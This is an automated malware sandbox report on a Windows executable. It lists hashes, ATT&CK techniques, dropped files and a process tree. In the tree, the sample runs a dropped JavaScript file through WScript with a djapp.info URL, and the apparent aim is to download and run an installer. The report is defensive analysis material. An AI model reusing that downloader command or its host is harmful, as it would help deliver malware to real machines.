1d21f633b5beec96b5a777690fbbb3e4f1e2f766a9282dcce967c1100e654ccc

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
05-05-2024 13:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe
Size

184KB
MD5

17d5ceebf106e989b0b4cabcdb9123dc
SHA1

95f7aabc5cbc6541160dcec0268dd89b3bf37099
SHA256

1d21f633b5beec96b5a777690fbbb3e4f1e2f766a9282dcce967c1100e654ccc
SHA512

f6cbaa4c343922aafb9499c2f58c5f399a8cfaa7d8e3a3dab96bdd3b3a0ddcb5a7c9512c1d731097a48fbbbd3fecf5a9b00e244875b90c356f95ec9dd6fb5271
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO35m:/7BSH8zUB+nGESaaRvoB7FJNndnam

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2944	WScript.exe
8	2944	WScript.exe
10	2944	WScript.exe
12	2600	WScript.exe
13	2600	WScript.exe
15	2708	WScript.exe
16	2708	WScript.exe
18	2020	WScript.exe
19	2020	WScript.exe
21	1508	WScript.exe
22	1508	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2224 wrote to memory of 2944	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	28
PID 2224 wrote to memory of 2944	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	28
PID 2224 wrote to memory of 2944	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	28
PID 2224 wrote to memory of 2944	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	28
PID 2224 wrote to memory of 2600	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	30
PID 2224 wrote to memory of 2600	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	30
PID 2224 wrote to memory of 2600	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	30
PID 2224 wrote to memory of 2600	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	30
PID 2224 wrote to memory of 2708	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	32
PID 2224 wrote to memory of 2708	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	32
PID 2224 wrote to memory of 2708	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	32
PID 2224 wrote to memory of 2708	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	32
PID 2224 wrote to memory of 2020	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	34
PID 2224 wrote to memory of 2020	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	34
PID 2224 wrote to memory of 2020	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	34
PID 2224 wrote to memory of 2020	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	34
PID 2224 wrote to memory of 1508	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	36
PID 2224 wrote to memory of 1508	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	36
PID 2224 wrote to memory of 1508	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	36
PID 2224 wrote to memory of 1508	2224	17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\17d5ceebf106e989b0b4cabcdb9123dc_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2224
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
  2⤵
  - Blocklisted process makes network request
  PID:2944
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
  2⤵
  - Blocklisted process makes network request
  PID:2600
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
  2⤵
  - Blocklisted process makes network request
  PID:2708
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
  2⤵
  - Blocklisted process makes network request
  PID:2020
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28E4.js" http://www.djapp.info/?domain=aGyLfxGFiD.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28E4.exe
  2⤵
  - Blocklisted process makes network request
  PID:1508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
ed89e34d7155c15ba34b2e8037f052fb

SHA1
45f90ed3c32a2e46361e9f5af26c61827dcceabd

SHA256
939a7f0780a999f6f67b3a64c5811946b1ee416d1b9cd4dba9d52f1d6ab787f9

SHA512
507c61186bc691e01fdbba126bfb6eb69d8e83027e83b50604992ebc4233d37f1e37737f264b3951486f660e0add1bfca75274808ed7bc87481ab6ce72e6c160

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
cb9ea2cbd4de3885756224f7f49adc3d

SHA1
d5fba5186f6f2d4d75601824ab294f1935b29b1e

SHA256
a5cf9fb4ac3a3520a0df020ebefcd941761b9f1680160551df438894a86a43f7

SHA512
db8ad00fac22bf1bf500542b5a043d2603ee204eb7c5e2769204aa8ce16dc24799446df88746eaa1d68ec221e4585d098b7b5b6e09bdf976510a01729a64e17a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
9a22f09f1e2acdb6f3076f006c42c46a

SHA1
70a7326f9396a9a43e5bfab33c29d119d7f53def

SHA256
22bcf2697cd35595cdcd4cc3181b08be96392f43028ab1de93b4f1a2f0b36651

SHA512
334ab5ac1b083679610ed33fc699a46f981231a7eed2cbfd9797bf624dda9bd1f4b78a0f623a42ff69c7e6695f199549934669d0d4292beade3bb1a5ffdced2f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
398080927005341e227f8f189545e304

SHA1
fb7ceb34d8301799e9b0640fdf20864f2a1f2237

SHA256
95eae0b153190a66991d7c6c58a902c21abd1a33ac1aff3acc92741654e72b4d

SHA512
577db8a22a59080c4f8bb28d752fa04801c18fe7340f2b8f8759c2752d13317868762125c9159bda3896f31a115c071f5f20518c08719af3d271a2bde33e1f9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm

Filesize
6KB

MD5
41cdb18ce288b8ca6ab835c100dddf4c

SHA1
8a75f5b6c11f075986a76f316478877c53e4d401

SHA256
10f02727adc3c3f1175296f1149e2cc84ebef4a010e2845e5b4fb75d37a8166e

SHA512
7fa3fc2040730c5dc15b50ddcf940d6d3dcd73fcf35e42812bcdf52145c14b69e751de74b8b18a3880d07e14a65f75377c4392888de701972ce7347023b410aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm

Filesize
6KB

MD5
ab657802cb2f6d3449cd2ea281e3fe22

SHA1
55b1104f8d62a37319e8b02f902ed52df6474499

SHA256
c7ec418d4335d226d451f704b7b15a62861ef5ad54d273064b76ce080e6f5239

SHA512
8f19ece709d4c54462777a6550f0444002203cec22a8e9d613c2928ab1e3bf3dff6890e7b6bedf6dc4e1ccc5b6b4ac530177a2d1ba2d6c6fb18a672aac8d594c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm

Filesize
6KB

MD5
89e38ff0cefb93b093d5c02145a7d456

SHA1
28215486c89a26bb511145e95a95d4976620ec1b

SHA256
92f7ac5e76e636fac3804bc7a5875a7ee21d290ac7cb47b7a4c2f60bf1723b6c

SHA512
16b9cb4b875a6b2294702981094943ede45d7b0d82d08d27025572180908856e187c7e87c182c3bf9f251093757bc8fefd94a818c35af774405a0db85f3a90a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm

Filesize
6KB

MD5
ee637eea5e9b4c4b8298465c29841b79

SHA1
eda8f6569bde469ce073cb9f819f90ed57223fff

SHA256
fc23967651d6176e21c1b384c96b5a4400a9d7ef4a1303accb66f16ada7f2bf4

SHA512
1e9906bc00633d8ecc13321e830923ad1fbb72b449e637b6c1719b31a17dd1e8904cac1eedfb6b9974cc927f4ec8858fd244fabcb6070ff34c9e643f54b48f67

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab589B.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar70FC.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf28E4.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\HS8OTRM6.txt

Filesize
177B

MD5
950d1ffa74a7d989a73633b251d1d9f1

SHA1
9f5e6fb7ce325b2b7d62ffa4489b1caee2c92cce

SHA256
ebd370e737af01c71af95017472780b2125eb779bf930e3bd3ab733f3f105e59

SHA512
58f6dd1c650475aa46f9065d3fa7162b903f0226e4e6a106a7ba195b4c5a558bf110156fd704cbafa76c9cd24244f2e4bc8f581ef05d95ddb0959360334443a9

Download Submit